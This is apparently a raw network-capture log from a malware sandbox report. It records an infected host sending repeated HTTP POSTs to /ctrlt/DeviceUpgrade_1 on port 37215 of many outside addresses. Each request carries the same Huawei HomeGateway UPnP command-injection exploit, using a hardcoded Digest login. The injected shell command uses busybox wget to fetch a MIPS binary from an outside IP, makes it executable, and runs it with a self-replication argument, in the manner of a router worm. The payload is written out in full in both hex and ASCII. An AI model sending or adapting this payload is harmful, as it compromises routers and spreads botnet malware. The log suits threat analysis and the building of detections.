                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1106192.168.2.2354924197.47.136.11237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527887106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1107192.168.2.236064641.19.56.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527892113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1108192.168.2.2353668157.12.142.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527973890 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1109192.168.2.2345978157.173.43.23837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.527982950 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1110192.168.2.2357622157.127.41.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528090954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1111192.168.2.234772041.30.77.10837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528104067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1112192.168.2.2354152157.158.126.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528173923 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1113192.168.2.233502241.249.84.11237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528177023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1114192.168.2.2357396205.216.184.20137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528182030 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1115192.168.2.2354072100.224.179.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.528192997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
